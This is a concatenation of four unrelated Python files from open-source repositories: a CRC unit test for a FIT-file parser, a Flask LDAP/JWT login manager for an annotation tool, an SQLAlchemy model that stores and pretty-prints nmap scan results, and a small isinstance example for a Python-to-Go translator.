#!/usr/bin/env python import sys from fitparse.records import Crc if sys.version_info >= (2, 7): import unittest else: import unittest2 as unittest class RecordsTestCase(unittest.TestCase): def test_crc(self): crc = Crc() self.assertEqual(0, crc.value) crc.update(b'\x0e\x10\x98\x00(\x00\x00\x00.FIT') self.assertEqual(0xace7, crc.value) # 0 must not change the crc crc.update(0) self.assertEqual(0xace7, crc.value) def test_crc_format(self): self.assertEqual('0x0000', Crc.format(0)) self.assertEqual('0x12AB', Crc.format(0x12AB)) if __name__ == '__main__': unittest.main()
backend/lost/api/user/login_manager.py
JonasGoebel/lost
490
30941
import datetime from flask_ldap3_login import LDAP3LoginManager, AuthenticationResponseStatus from lost.settings import LOST_CONFIG, FLASK_DEBUG from flask_jwt_extended import create_access_token, create_refresh_token from lost.db.model import User as DBUser, Group from lost.db import roles class LoginManager(): def __init__(self, dbm, user_name, password): self.dbm = dbm self.user_name = user_name self.password = password def login(self): if LOST_CONFIG.ldap_config['LDAP_ACTIVE']: access_token, refresh_token = self.__authenticate_ldap() else: access_token, refresh_token = self.__authenticate_flask() if access_token and refresh_token: return { 'token': access_token, 'refresh_token': refresh_token }, 200 return {'message': 'Invalid credentials'}, 401 def __get_token(self, user_id): expires = datetime.timedelta(minutes=LOST_CONFIG.session_timeout) expires_refresh = datetime.timedelta(minutes=LOST_CONFIG.session_timeout + 2) if FLASK_DEBUG: expires = datetime.timedelta(days=365) expires_refresh = datetime.timedelta(days=366) access_token = create_access_token(identity=user_id, fresh=True, expires_delta=expires) refresh_token = create_refresh_token(user_id, expires_delta=expires_refresh) return access_token, refresh_token def __authenticate_flask(self): if self.user_name: user = self.dbm.find_user_by_user_name(self.user_name) if user and user.check_password(self.password): return self.__get_token(user.idx) return None, None def __authenticate_ldap(self): # auth with ldap ldap_manager = LDAP3LoginManager() ldap_manager.init_config(LOST_CONFIG.ldap_config) # Check if the credentials are correct response = ldap_manager.authenticate(self.user_name, self.password) if response.status != AuthenticationResponseStatus.success: # no user found in ldap, try it with db user: return self.__authenticate_flask() user_info = response.user_info user = self.dbm.find_user_by_user_name(self.user_name) # user not in db: if not user: user = self.__create_db_user(user_info) else: # user in db -> synch with ldap user = self.__update_db_user(user_info, user) return self.__get_token(user.idx) def __create_db_user(self, user_info): user = DBUser(user_name=user_info['uid'], email=user_info['mail'], email_confirmed_at=datetime.datetime.now(), first_name=user_info['givenName'], last_name=user_info['sn'], is_external=True) anno_role = self.dbm.get_role_by_name(roles.ANNOTATOR) user.roles.append(anno_role) user.groups.append(Group(name=user.user_name, is_user_default=True)) self.dbm.save_obj(user) return user def __update_db_user(self, user_info, user): user.email = user_info['mail'] user.first_name = user_info['givenName'] user.last_name = user_info['sn'] self.dbm.save_obj(user) return user
pipeline/models/nmap_model.py
ponderng/recon-pipeline
352
30971
<reponame>ponderng/recon-pipeline<filename>pipeline/models/nmap_model.py import textwrap from sqlalchemy.orm import relationship from sqlalchemy import Column, Integer, ForeignKey, String, Boolean from .base_model import Base from .port_model import Port from .ip_address_model import IPAddress from .nse_model import nse_result_association_table class NmapResult(Base): """ Database model that describes the TARGET.nmap scan results. Represents nmap data. Relationships: ``target``: many to one -> :class:`pipeline.models.target_model.Target` ``ip_address``: one to one -> :class:`pipeline.models.ip_address_model.IPAddress` ``port``: one to one -> :class:`pipeline.models.port_model.Port` ``nse_results``: one to many -> :class:`pipeline.models.nse_model.NSEResult` """ def __str__(self): return self.pretty() def pretty(self, commandline=False, nse_results=None): pad = " " ip_address = self.ip_address.ipv4_address or self.ip_address.ipv6_address msg = f"{ip_address} - {self.service}\n" msg += f"{'=' * (len(ip_address) + len(self.service) + 3)}\n\n" msg += f"{self.port.protocol} port: {self.port.port_number} - {'open' if self.open else 'closed'} - {self.reason}\n" msg += f"product: {self.product} :: {self.product_version}\n" msg += "nse script(s) output:\n" if nse_results is None: # add all nse scripts for nse_result in self.nse_results: msg += f"{pad}{nse_result.script_id}\n" msg += textwrap.indent(nse_result.script_output, pad * 2) msg += "\n" else: # filter used, only return those specified for nse_result in nse_results: if nse_result in self.nse_results: msg += f"{pad}{nse_result.script_id}\n" msg += textwrap.indent(nse_result.script_output, pad * 2) msg += "\n" if commandline: msg += "command used:\n" msg += f"{pad}{self.commandline}\n" return msg __tablename__ = "nmap_result" id = Column(Integer, primary_key=True) open = Column(Boolean) reason = Column(String) service = Column(String) product = Column(String) commandline = Column(String) product_version = Column(String) port = relationship(Port) port_id = Column(Integer, ForeignKey("port.id")) ip_address = relationship(IPAddress) ip_address_id = Column(Integer, ForeignKey("ip_address.id")) target_id = Column(Integer, ForeignKey("target.id")) target = relationship("Target", back_populates="nmap_results") nse_results = relationship("NSEResult", secondary=nse_result_association_table, back_populates="nmap_results")
examples/isinstance.py
quynhanh-ngx/pytago
206
30972
def main(): a = ["a", 1, "5", 2.3, 1.2j] some_condition = True for x in a: # If it's all isinstance, we can use a type switch if isinstance(x, (str, float)): print("String or float!") elif isinstance(x, int): print("Integer!") else: print("Dunno!") print(":)") # If it's got mixed expressions, we will inline a switch for the isinstance expression if isinstance(x, str) and some_condition: print("String") elif isinstance(x, int): print("Integer!") else: print("Dunno!!") print(":O") if __name__ == '__main__': main()